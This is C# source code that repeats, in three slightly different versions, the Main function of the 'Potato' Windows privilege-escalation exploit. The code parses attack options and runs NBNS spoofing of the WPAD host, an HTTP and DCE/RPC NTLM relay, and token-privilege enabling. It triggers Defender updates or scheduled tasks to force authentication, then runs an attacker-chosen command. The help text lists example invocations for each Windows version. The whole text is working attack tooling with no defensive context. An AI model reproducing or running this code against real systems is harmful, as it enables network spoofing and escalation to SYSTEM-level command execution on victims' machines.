static int Main(string[] args) { Dictionary <string, string> argDict = parseArgs(args); String cmd = "\"C:\\Windows\\System32\\cmd.exe\" /K start"; String ip = null, spoof_address = null, disable_exhaust = null, disable_spoof = null, disable_defender = null, schedule_task = null, spoof_host = "WPAD"; String wpad_exclude_str = "live.sysinternals.com"; int srvPort = 80; if (argDict.ContainsKey("ip")) { ip = argDict["ip"]; } if (argDict.ContainsKey("cmd")) { cmd = argDict["cmd"]; } if (argDict.ContainsKey("disable_exhaust")) { disable_exhaust = argDict["disable_exhaust"]; } if (argDict.ContainsKey("disable_defender")) { disable_defender = argDict["disable_defender"]; } if (argDict.ContainsKey("disable_spoof")) { disable_spoof = argDict["disable_spoof"]; } if (argDict.ContainsKey("spoof_host")) { spoof_host = argDict["spoof_host"]; } if (argDict.ContainsKey("wpad_exclude")) { wpad_exclude_str = argDict["wpad_exclude"]; } if (argDict.ContainsKey("schedule_task")) { schedule_task = argDict["schedule_task"]; } if (argDict.ContainsKey("srv_port")) { srvPort = Int32.Parse(argDict["srv_port"]); } if (argDict.ContainsKey("spoof_address")) { spoof_address = argDict["spoof_address"]; } else { spoof_address = "127.0.0.1"; } if (ip == null) { Console.WriteLine("Usage: potato.exe -ip <ip address, required> -cmd <command, optional> -disable_exhaust <true/false, optional> -disable_defender <true/false, optional> -disable_spoof <true/false, optional> -spoof_host <default wpad, optional> -spoof_address <default, localip> -wpad_exclude <comma separated host to exclude, optional> -schedule_task <true/false, Win10 only, optional> -srv_port <port for webserver to listen, default 80>"); return(0); } bool disableExhaust = false; if (disable_exhaust != null && disable_exhaust.Equals("true")) { disableExhaust = true; } Spoofer spoof; spoof = new NBNSSpoofer(); HTTPNtlmHandler httpServer = new HTTPNtlmHandler(); String[] wpad_exclude = wpad_exclude_str.Split(','); Thread httpServerThread = new Thread(() => httpServer.startListening(cmd, wpad_exclude, srvPort)); httpServerThread.Start(); Thread spoofThread = new Thread(() => spoof.startSpoofing(ip, spoof_host, spoof_address, disableExhaust)); if (disable_spoof == null || disable_spoof.Equals("false")) { spoofThread.Start(); if (!disableExhaust) { while (NBNSSpoofer.doneUdp == false) { Thread.Sleep(2000); } } spoof.checkSpoof(spoof_host, spoof_address); Console.WriteLine("Spoofed target " + spoof_host + " succesfully..."); } UpdateLauncher updateL = new UpdateLauncher(); Thread updateLThread = new Thread(() => updateL.launchUpdateCheck()); if (disable_defender == null || disable_defender.Equals("false")) { updateLThread.Start(); } ScheduleTask sc = new ScheduleTask(); Thread schTask = new Thread(() => sc.schtask(srvPort)); if (schedule_task != null && schedule_task.Equals("true")) { schTask.Start(srvPort); } httpServer.finished.WaitOne(); spoofThread.Abort(); updateLThread.Abort(); httpServerThread.Abort(); return(0); }
// static int Main(string[] args) { Dictionary <string, string> argDict = parseArgs(args); String cmd = "\"C:\\Windows\\System32\\cmd.exe\" /K start"; String ip = null, drop_first = null, enable_httpserver = null, spoof_address = null, enable_dce = null, enable_exhaust = null, enable_spoof = null, enable_defender = null, enable_defender_scan = null, schedule_task = null, spoof_host = "WPAD", enable_etw = null, enable_token = null; String wpad_exclude_str = "live.sysinternals.com"; int srvPort = 80; if (argDict.ContainsKey("ip")) { ip = argDict["ip"]; } if (argDict.ContainsKey("cmd")) { cmd = argDict["cmd"]; } if (argDict.ContainsKey("enable_exhaust")) { enable_exhaust = argDict["enable_exhaust"]; } if (argDict.ContainsKey("enable_httpserver")) { enable_httpserver = argDict["enable_httpserver"]; } if (argDict.ContainsKey("enable_defender")) { enable_defender = argDict["enable_defender"]; } if (argDict.ContainsKey("enable_defender_scan")) { enable_defender_scan = argDict["enable_defender_scan"]; } if (argDict.ContainsKey("enable_spoof")) { enable_spoof = argDict["enable_spoof"]; } if (argDict.ContainsKey("enable_etw")) { enable_etw = argDict["enable_etw"]; } if (argDict.ContainsKey("spoof_host")) { spoof_host = argDict["spoof_host"]; } if (argDict.ContainsKey("wpad_exclude")) { wpad_exclude_str = argDict["wpad_exclude"]; } if (argDict.ContainsKey("schedule_task")) { schedule_task = argDict["schedule_task"]; } if (argDict.ContainsKey("srv_port")) { srvPort = Int32.Parse(argDict["srv_port"]); } if (argDict.ContainsKey("enable_dce")) { enable_dce = argDict["enable_dce"]; } if (argDict.ContainsKey("spoof_address")) { spoof_address = argDict["spoof_address"]; } else { spoof_address = "127.0.0.1"; } if (argDict.ContainsKey("drop_first_dcom")) { drop_first = argDict["drop_first_dcom"]; } if (argDict.ContainsKey("enable_token")) { enable_token = argDict["enable_token"]; } ; // if (args.Length > 0) { if (args[0].ToLower() == "-h" || args[0].ToLower() == "--h" || args[0].ToLower() == "-help" || args[0].ToLower() == "--help" || args[0].ToLower() == "/?") { PrintHelp(); Console.WriteLine("\nExample Windows 7:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true"); Console.WriteLine("\nExample Windows 10:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -schedule_task true"); Console.WriteLine("\nExample Windows Server 2008:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -enable_spoof true -spoof_host \"WPAD.DOMAIN.TLD\" "); Console.WriteLine("\nExample Windows Server 2012:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -enable_spoof true"); Console.WriteLine("\nExample Windows 10:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -enable_defender_scan true"); Console.WriteLine("\nExample Enable WebClient:\nPotato.exe -enable_etw true\nPotato.exe -enable_etw 22b6d684-fa63-4578-87c9-effcbe6643c7"); Console.WriteLine("\nExample IIS/MSSQL/*:\nPotato.exe -enable_token true -enable_dce true"); Console.WriteLine("Potato.exe -enable_token true -enable_httpserver true -enable_defender_scan true -srv_port 9595"); Console.WriteLine("Potato.exe"); Environment.Exit(0); } } else { enable_token = "true"; enable_dce = "true"; } // if (enable_token != null) { // Console.WriteLine("Enabiling your privs...."); InvokePrivs.EnablePriv("SeImpersonatePrivilege"); } // if (enable_etw != null) { EventTriggers.start_service(enable_etw); } // String[] wpad_exclude = wpad_exclude_str.Split(','); HTTPNtlmHandler httpServer = new HTTPNtlmHandler(); Thread httpServerThread = null; if (enable_httpserver != null && enable_httpserver.Equals("true")) { httpServerThread = new Thread(() => httpServer.startListening(cmd, wpad_exclude, srvPort, enable_token)); httpServerThread.Start(); } // DCERPCNtlmHandler dcerpcServer = new DCERPCNtlmHandler(); bool dropFirst = drop_first != null && drop_first.Equals("true"); Thread bootstrapThread = null; Thread dcerpcThread = null; if (enable_dce != null && enable_dce.Equals("true")) { dcerpcThread = new Thread(() => dcerpcServer.start("127.0.0.1", "6666", "127.0.0.1", "135", cmd, dropFirst, enable_token)); dcerpcThread.Start(); Thread.Sleep(100); try { bootstrapThread = new Thread(() => ComUtils.BootstrapComMarshal()); bootstrapThread.Start(); } catch (Exception e) { Console.WriteLine("This wasn't supposed to happen... {0}", e); } } // Spoofer spoof = new NBNSSpoofer(); bool enableExhaust = enable_exhaust != null && enable_exhaust.Equals("true"); Thread spoofThread = new Thread(() => spoof.startSpoofing(ip, spoof_host, spoof_address, enableExhaust)); if (enable_spoof != null && enable_spoof.Equals("true")) { if (ip == null || spoof_address == null) { Console.WriteLine("Need IP and spoof address for spoofing?"); Environment.Exit(0); } spoofThread.Start(); if (enableExhaust) { while (NBNSSpoofer.doneUdp == false) { Thread.Sleep(2000); } } spoof.checkSpoof(spoof_host, spoof_address); Console.WriteLine("Spoofed target " + spoof_host + " succesfully..."); } // UpdateLauncher updateL = new UpdateLauncher(); Thread updateLThread = new Thread(() => updateL.launchUpdateCheck()); if (enable_defender != null && enable_defender.Equals("true")) { updateLThread.Start(); } // Thread scanLThread = new Thread(() => updateL.scan_file(srvPort)); if (enable_defender_scan != null && enable_defender_scan.Equals("true")) { scanLThread.Start(); } // ScheduleTask sc = new ScheduleTask(); Thread schTask = new Thread(() => sc.schtask(srvPort)); if (schedule_task != null && schedule_task.Equals("true")) { schTask.Start(); } // if (httpServerThread != null) { httpServer.finished.WaitOne(); httpServerThread.Abort(); } // if (dcerpcThread != null) { DCERPCNtlmHandler.finished.WaitOne(); dcerpcThread.Abort(); bootstrapThread.Abort(); } // spoofThread.Abort(); updateLThread.Abort(); scanLThread.Abort(); Thread.Sleep(500); Environment.Exit(0); return(0); }
static int Main(string[] args) { Dictionary<string, string> argDict = parseArgs(args); String cmd = "\"C:\\Windows\\System32\\cmd.exe\" /K start"; String ip = null,spoof_address = null,disable_exhaust = null, disable_spoof = null, disable_defender = null,schedule_task = null,spoof_host = "WPAD"; String wpad_exclude_str="live.sysinternals.com"; int srvPort = 80; if (argDict.ContainsKey("ip")) ip = argDict["ip"]; if (argDict.ContainsKey("cmd")) cmd = argDict["cmd"]; if (argDict.ContainsKey("disable_exhaust")) disable_exhaust = argDict["disable_exhaust"]; if (argDict.ContainsKey("disable_defender")) disable_defender = argDict["disable_defender"]; if (argDict.ContainsKey("disable_spoof")) disable_spoof = argDict["disable_spoof"]; if (argDict.ContainsKey("spoof_host")) spoof_host = argDict["spoof_host"]; if (argDict.ContainsKey("wpad_exclude")) wpad_exclude_str = argDict["wpad_exclude"]; if (argDict.ContainsKey("schedule_task")) schedule_task = argDict["schedule_task"]; if (argDict.ContainsKey("srv_port")) srvPort = Int32.Parse(argDict["srv_port"]); if (argDict.ContainsKey("spoof_address")) spoof_address = argDict["spoof_address"]; else spoof_address = "127.0.0.1"; if (ip == null) { Console.WriteLine("Usage: potato.exe -ip <ip address, required> -cmd <command, optional> -disable_exhaust <true/false, optional> -disable_defender <true/false, optional> -disable_spoof <true/false, optional> -spoof_host <default wpad, optional> -spoof_address <default, localip> -wpad_exclude <comma separated host to exclude, optional> -schedule_task <true/false, Win10 only, optional> -srv_port <port for webserver to listen, default 80>"); return 0; } bool disableExhaust = false; if (disable_exhaust != null && disable_exhaust.Equals("true")) { disableExhaust = true; } Spoofer spoof; spoof = new NBNSSpoofer(); HTTPNtlmHandler httpServer = new HTTPNtlmHandler(); String[] wpad_exclude = wpad_exclude_str.Split(','); Thread httpServerThread = new Thread(() => httpServer.startListening(cmd,wpad_exclude,srvPort)); httpServerThread.Start(); Thread spoofThread = new Thread(() => spoof.startSpoofing(ip,spoof_host,spoof_address, disableExhaust)); if (disable_spoof == null || disable_spoof.Equals("false")) { spoofThread.Start(); if (!disableExhaust) { while (NBNSSpoofer.doneUdp == false) { Thread.Sleep(2000); } } spoof.checkSpoof(spoof_host,spoof_address); Console.WriteLine("Spoofed target " + spoof_host + " succesfully..."); } UpdateLauncher updateL = new UpdateLauncher(); Thread updateLThread = new Thread(() => updateL.launchUpdateCheck()); if (disable_defender == null || disable_defender.Equals("false")) { updateLThread.Start(); } ScheduleTask sc = new ScheduleTask(); Thread schTask = new Thread(() => sc.schtask(srvPort)); if (schedule_task != null && schedule_task.Equals("true")) { schTask.Start(srvPort); } httpServer.finished.WaitOne(); spoofThread.Abort(); updateLThread.Abort(); httpServerThread.Abort(); return 0; }